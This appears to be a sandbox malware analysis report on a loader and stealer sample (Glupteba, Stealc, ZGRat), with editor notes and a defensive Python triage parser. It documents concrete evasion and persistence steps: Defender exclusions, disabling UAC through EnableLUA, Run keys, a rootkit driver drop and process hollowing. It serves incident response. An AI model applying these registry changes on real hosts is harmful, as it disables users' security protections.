Malware Analysis Report

2024-11-15 08:44

Sample ID 240510-enhk2ahh9v
Target d6078bbecc15a333c6171debc4488498.exe
SHA256 8ddb2ac7260e57b2f20a55e30eb1b41595f38bf484b0a94e9495f3107c3bb913
Tags
glupteba privateloader stealc zgrat discovery dropper evasion execution loader persistence rat rootkit spyware stealer themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8ddb2ac7260e57b2f20a55e30eb1b41595f38bf484b0a94e9495f3107c3bb913

Threat Level: Known bad

The file d6078bbecc15a333c6171debc4488498.exe was found to be: Known bad.

Malicious Activity Summary

glupteba privateloader stealc zgrat discovery dropper evasion execution loader persistence rat rootkit spyware stealer themida trojan upx

Glupteba payload

Stealc

Modifies firewall policy service

Windows security bypass

ZGRat

UAC bypass

Detect ZGRat V1

PrivateLoader

Glupteba

Modifies boot configuration data using bcdedit

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Drops file in Drivers directory

Possible attempt to disable PatchGuard

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Downloads MZ/PE file

Reads user/profile data of web browsers

Checks computer location settings

Reads data files stored by FTP clients

Windows security modification

Themida packer

Checks BIOS information in registry

UPX packed file

Drops startup file

Loads dropped DLL

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

Checks installed software on the system

Looks up external IP address via web service

Adds Run key to start application

Checks whether UAC is enabled

Manipulates WinMonFS driver.

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

Program crash

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

System policy modification

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious behavior: LoadsDriver

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 04:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 04:05

Reported

2024-05-10 04:07

Platform

win7-20240215-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe"

Signatures

Detect ZGRat V1

3 matches (indicator, process and target not shown in the report)

Glupteba

loader dropper glupteba

Glupteba payload

15 matches (indicator, process and target not shown in the report)

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A

PrivateLoader

loader privateloader

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Note: this write lands in HKLM, so the sample was already running elevated when it happened (the sandbox user is Admin). EnableLUA = 0 turns UAC off for future sessions rather than getting past a prompt, and the change only takes full effect after a reboot; read it as a durable weakening of the host, not as the privilege-escalation step itself.

Windows security bypass

evasion trojan
Note on reading these rows: Defender stores each exclusion as a value whose name is the excluded path or process and whose DWORD data is 0, so "= 0" here means an exclusion was added, not that something was disabled. Together the ten entries map out the install layout to check on a suspect host: the staging directory C:\Users\Admin\AppData\Local\Temp\csrss, the install directory C:\Windows\rss, the binary C:\Windows\windefender.exe, the drivers directory, the process names csrss.exe and windefender.exe, and the four droppers in the Pictures folder.
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Sumv9e2zZTPfbr2KJrMWLNxW.exe = "0" C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\00fKWSRoAerNWHLuZOUwTWLf.exe = "0" C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\uTsEd5zaWAwTh2I5zhyQgn96.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\dSRtB270COtELwP0avgpGVnT.exe = "0" C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ARjQUSHzQYtRWezpQRCfQhpA.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OYMwLXrmZMiex6EUCXyUvaLi.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GkcKN5W0Qsc1Iu0iNolJG9YA.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ET1F8QmK4lwnrcepgBxgn0a9.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\31qGBJcGUvOUxPWSwiaphdYR.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XqQTJm8eo9LYXK4iYRu71AFH.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\B3hGdaAIo7EP8qbDaWdC7YgL.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A

Loads dropped DLL

Process (number of dropped-DLL loads, in the order reported)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe (10)
C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe (9)
C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe (2)
C:\Users\Admin\AppData\Local\Temp\u26o.0.exe (2)
C:\Windows\rss\csrss.exe (1)
N/A (1)
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe (5)
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (5)
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe (3)
C:\Windows\rss\csrss.exe (1)
The report shows no indicator (DLL path) or target for any of these 39 loads.

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
3 matches (indicator, process and target not shown in the report)

UPX packed file

upx
5 matches (indicator, process and target not shown in the report)

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Sumv9e2zZTPfbr2KJrMWLNxW.exe = "0" C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\dSRtB270COtELwP0avgpGVnT.exe = "0" C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\uTsEd5zaWAwTh2I5zhyQgn96.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\00fKWSRoAerNWHLuZOUwTWLf.exe = "0" C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Note on reading this table: every writer sets the same entry, a Run value named csrss whose command is C:\Windows\rss\csrss.exe. That is the copy the droppers create (see Drops file in Windows directory), not the genuine Client/Server Runtime in C:\Windows\System32. The value sits in the logged-on user's hive (S-1-5-21-2248906074-2862704502-246302768-1000 is HKCU for the Admin account), so it fires at that user's next logon; when hunting, pair it with the csrss.exe and C:\Windows\rss Defender exclusions above.
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
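Turning the registry and file rows above into something a responder can act on is mostly a parsing problem, because the report flattens each table row into a single line. The script below is an example added by the editor, not part of the sandbox output: it parses rows in the shape used on this page (the row grammar is inferred from the page, and the C:\ or \??\ prefix of the process column is assumed to mark where the indicator column ends), classifies the registry writes seen in this report (Defender exclusions, EnableLUA, the Run key, the firewall rule) together with driver and Startup-folder drops, and groups the resulting artifacts by the process that created them. The sample rows are copied from this report.

```python
from __future__ import annotations

import json
import re
from collections import defaultdict

# One flattened "Description Indicator Process Target" row as it appears in
# this report. The process column is a sandbox file path, a device path
# (\??\...) or N/A, which is what tells us where the indicator column ends.
ROW = re.compile(
    r"^(?P<desc>Set value \((?:int|str|data)\)"
    r"|Key (?:opened|queried|enumerated|created|value queried)"
    r"|File (?:created|opened for modification|opened \(read-only\)))\s+"
    r"(?P<indicator>.+?)\s+"
    r"(?P<process>C:\\\S+|\\\?\?\\\S+|N/A)\s+"
    r"(?P<target>\S+)$"
)
# A "Set value" indicator is the registry path, ' = ', then either a quoted
# string using \" and \\ escapes (REG_SZ) or bare hex (REG_BINARY).
SETVAL = re.compile(r'^(?P<path>\\REGISTRY\\.+?) = (?P<value>"(?:[^"\\]|\\.)*"|[0-9a-f]+)$')


def parse_row(line: str) -> dict[str, str] | None:
    m = ROW.match(line.strip())
    return m.groupdict() if m else None


def classify_registry_write(path: str, value: str) -> tuple[str, str] | None:
    """Map a registry write to what it buys the malware and to the concrete
    artifact (excluded path, run command, rule name) to verify on a host.
    The rules are the editor's own, written against the writes in this report."""
    p = path.lower()
    if "\\windows defender\\exclusions\\paths\\" in p:
        return "Defender path exclusion", path.split("\\Exclusions\\Paths\\", 1)[1]
    if "\\windows defender\\exclusions\\processes\\" in p:
        return "Defender process exclusion", path.split("\\Exclusions\\Processes\\", 1)[1]
    if p.endswith("\\policies\\system\\enablelua") and value == '"0"':
        return "UAC disabled (EnableLUA=0)", path
    if "\\currentversion\\run\\" in p:
        # The report escapes REG_SZ data like a JSON string; undo that.
        return "Run-key persistence", json.loads(value)
    if "\\firewallpolicy\\firewallrules\\" in p:
        return "Firewall rule added", path.split("\\FirewallRules\\", 1)[1]
    return None


def triage(lines: list[str]) -> dict[str, list[tuple[str, str]]]:
    """Group the artifacts worth hunting for by the process that created them.
    Rows the ROW pattern does not cover (thread-context rows, all-N/A rows) are skipped."""
    by_process: dict[str, list[tuple[str, str]]] = defaultdict(list)
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        hit = None
        if row["desc"].startswith("Set value"):
            sv = SETVAL.match(row["indicator"])
            if sv:
                hit = classify_registry_write(sv["path"], sv["value"])
        elif row["desc"] == "File created" and "\\drivers\\" in row["indicator"].lower():
            hit = ("Kernel driver dropped", row["indicator"])
        elif row["desc"] == "File created" and "\\Startup\\" in row["indicator"]:
            hit = ("Startup-folder persistence", row["indicator"].rsplit("\\", 1)[1])
        if hit:
            by_process[row["process"]].append(hit)
    return dict(by_process)


# Rows copied from the signature tables in this report (constructed input;
# the last row is deliberately one the parser does not handle).
SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A',
    r'File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A',
    r'File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ARjQUSHzQYtRWezpQRCfQhpA.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A',
    r'PID 2220 set thread context of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe',
]

if __name__ == "__main__":
    for process, hits in triage(SAMPLE_ROWS).items():
        print(process)
        for technique, artifact in hits:
            print(f"  {technique}: {artifact}")
```

The value column is the awkward part: the report escapes REG_SZ data with \" and \\ (the Run-key command comes out as "\"C:\\Windows\\rss\\csrss.exe\""), and json.loads happens to accept exactly that escaping, which is why the Run-key artifact decodes to the quoted command line the malware actually wrote.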

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Manipulates WinMon driver

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A
Note: \??\WinMon and \??\WinMonFS are device names, not files on disk. The dropped C:\Windows\rss\csrss.exe is opening handles to the kernel driver it installed as C:\Windows\system32\drivers\Winmon.sys (see Drops file in Drivers directory), which is how the user-mode component talks to the rootkit; the LoadsDriver and sc.exe signatures in the summary are the same chain seen from the service-control side.

Drops file in System32 directory

Note on reading this table: C:\Windows\System32\GroupPolicy\Machine\Registry.pol holds the local machine GPO's registry policy and gpt.ini carries its version counter. Writing both means the dropper is pushing settings as local Group Policy, which the policy engine re-applies at every refresh, so removing the corresponding registry values by hand will not stick until Registry.pol is cleaned up as well. Compare the System policy modification tag in the summary.
Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2220 set thread context of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Note: the sample (PID 2220) rewrote the thread context of a jsc.exe process (PID 2572), the step that redirects execution in process hollowing. jsc.exe is the .NET JScript compiler and has no business dropping Startup .bat files or loading dropped DLLs, so the later rows attributed to C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe are the injected payload running under a signed Microsoft binary's name.

Checks for VirtualBox DLLs, possible anti-VM trick

Note on reading this table: despite the signature name, \??\VBoxMiniRdrDN is the device exposed by the VirtualBox shared-folders driver, not a DLL; a successful open tells the dropper it is running inside VirtualBox. All four Pictures droppers run the check, on top of the ACPI (DSDT\VBOX__) and BIOS-version registry reads above.
Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A

Drops file in Windows directory

Note on reading this table: the CbsPersist_20240510040523.cab written by makecab.exe is routine servicing-log rotation and can be ignored. The rest is the install sequence: each of the four Pictures droppers writes C:\Windows\rss\csrss.exe, and that copy in turn writes C:\Windows\windefender.exe.
Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20240510040523.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u26o.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u26o.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u26o.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u26o.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u26o.0.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Note on reading this table: the MuiCache rows are side effects of the processes resolving localized resource strings (time-zone names from tzres.dll, NAP component descriptions from netsh), not values the malware set on purpose. What matters is the hive: HKEY_USERS\.DEFAULT is the profile that processes running as LocalSystem get as HKCU, so writes there by C:\Windows\windefender.exe, netsh.exe and C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe are consistent with those processes running as SYSTEM by that point.
Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
